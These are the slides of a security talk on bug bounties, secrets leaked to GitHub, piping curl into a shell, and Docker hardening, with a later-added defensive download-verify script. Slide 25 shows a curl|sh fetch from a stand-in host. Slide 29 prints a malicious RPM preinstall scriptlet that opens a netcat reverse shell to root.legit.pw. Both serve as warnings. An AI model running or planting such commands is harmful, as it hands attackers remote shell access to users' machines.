Slide 1

Security For Non-Unicorns
https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog
@benjammingh for Operability.io

Slide 2

Who's this clown?
• Infrastructure security charlatan at Etsy
• Operations monkey at Puppet Labs
• Survived a bunch of startups in London. (some of them still have websites...)
• Has far too many opinions about pretty much everything on the TwitterNet @benjammingh
https://twitter.com/skullmandible/status/411281851131523072

Slide 3

Unicorns?

Slide 4

Setlist
• The problem(™).
• The solution(s)(™).
• The wrap up.
• Rapturous applause.
• We all go home/dance parties/our secret lives as superheroes & heroines.

Slide 5

The problem: security is hard.

Slide 6

From tiny seeds, do mighty acorns grow.
• PinkiePwn's 6 small bugs in Chrome to full sandbox escape
• Egor Homakov's 5 small bugs in GitHub to full private access on GitHub
• From XSS to remote code execution in under an hour
• Username & password stolen for HVAC system leads to $160+ Million Target breach.

Slide 7

Things that aren't security are hard too.

Slide 8

Computering is hard.
No. 1 takeaway for security types is a sense of perspective.

Slide 9

Security people aren't great secure coders.
• Snort: 10 CVEs, Wireshark: 322(!) CVEs
• Joxean Koret on Breaking Antivirus software
• Security Firm Bit9 Hacked, Used to Spread Malware
• Tavis Ormandy from Project Zero on exploiting ESET
• BEST! FireEye just running Apache/PHP as root

Slide 10

So who do I trust?
• No one? Always a great position for security people, who don't want to get paid.
• Everyone? Do I have a 419 email for YOU!
• Security vendors? If you have infinite money and no attackers.
• Attackers!

Slide 11

"You're already being probed for security holes, do you want to know or not?"

Slide 12

Bug bounties 101: Have one!
Bugcrowd vs. HackerOne

Slide 13

Bug bounties 102: Prepare a lot.

Slide 14

Bug bounties 103: The first few weeks will be hell.

Slide 15

Bug bounties 104: Be ready with bees!

Slide 16

Security on the inside

Slide 17

Armadillo security architecture

Slide 18

Cloud

Slide 19

GitHub

Slide 20


Slide 21

But this doesn't happen in real life, right?

Slide 22


Slide 23

Go use Gitrob
• http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
• https://github.com/michenriksen/gitrob

Slide 24

curl | bash

Slide 25

curl legit.pw/mac | sh

Slide 26

"But I check them, obviously!"

Slide 27


Slide 28

curl | bash
"But this is no worse than packages."
root# yum install sketchy

Slide 29

curl | bash
root# rpm -qp --scripts sketchy-1.33-7.rpm
preinstall scriptlet (using /bin/sh):
bash -c 'while : ; \
  do \
    nc -e /bin/sh root.legit.pw 2222 ;\
  done'
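The alternative to `curl URL | sh` that the "But I check them, obviously!" slide is getting at, as an added example (not code from the talk): fetch the installer to a file, compare its SHA-256 with a digest obtained out-of-band (a signed release note, a value pinned in config management), and only run it when the digest matches. The function names `sha256_of`, `verify_script` and `fetch_verify_run`, the URL and the digest are my placeholders; the same check also covers a downloaded RPM, where `rpm -qp --scripts` can then be run on the verified file before installing it.

```shell
# Added example, not from the talk. Download-verify-run instead of curl | sh.
# The expected digest must come from somewhere other than the download
# server itself, or the check proves nothing.

sha256_of() {
    # Portable SHA-256 of a file: GNU coreutils on Linux, shasum on macOS/BSD.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_script FILE EXPECTED_SHA256 -> returns 0 on match, 1 on mismatch.
verify_script() {
    file="$1"; expected="$2"
    actual="$(sha256_of "$file")"
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "digest mismatch for $file: expected $expected, got $actual" >&2
    return 1
}

# fetch_verify_run URL EXPECTED_SHA256: download to a temp file, verify,
# and only then execute. The script is never piped straight into a shell.
fetch_verify_run() {
    url="$1"; expected="$2"
    tmp="$(mktemp)"
    if ! curl -fsSL -o "$tmp" "$url"; then
        rm -f "$tmp"
        return 1
    fi
    if verify_script "$tmp" "$expected"; then
        sh "$tmp"; rc=$?
    else
        rc=1
    fi
    rm -f "$tmp"
    return $rc
}

# Usage (placeholder URL and digest):
# fetch_verify_run https://example.invalid/install.sh <sha256-from-release-notes>
```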

Slide 30

A LIVE DEMO, madness.

Slide 31

Lightweight containers!

Slide 32

chroot(8)

Slide 33

FreeBSD Jails

Slide 34

Solaris Zones

Slide 35

AIX LPAR

Slide 36


Slide 37

Is Docker secure?

Slide 38

">30% of Images in Docker Hub Contain High Priority Security Vulns" - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps

Slide 39


Slide 40

As secure as Vagrant?

Slide 41

But is Docker itself secure?
• Don't run things as root.
• No really, stop running things as root.
• Did I mention not running things as root.
• It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)

Slide 42

Securify the Docker.
• Don't use --privileged.
• Use --cap-drop all and --cap-add to get the minimum capabilities.
• Use Docker Notary
• Use grsecurity (just do that anyway, if you can.)
• Use SELinux... I may as well ask for a pony here.

Slide 43

Summary
• Computers are apparently hard.
• Security is clearly harder still, obv.
• Actually, trust and humans are hard.
• The typing is the easy bit. (ish)

Slide 44

More Summary
• Complex systems lead to much more complex security problems. (see OAuth)
• Annual pen-tests don't scale, bug bounties can.
• Attackers are mining any public info you have (GitHub, S3)
• I beg you to stop trusting curl.
• Docker and security can be used in the same sentence.

Slide 45

Thank you!
Twidder: @benjammingh
LinkedIn: lnkdin.me/p/benyeah
FidoNet: 2:254/524.13
JitHub: github.com/barn
SpeakerDeck: speakerdeck.com/barnbarn
Etsy: Careers CodeAsCraft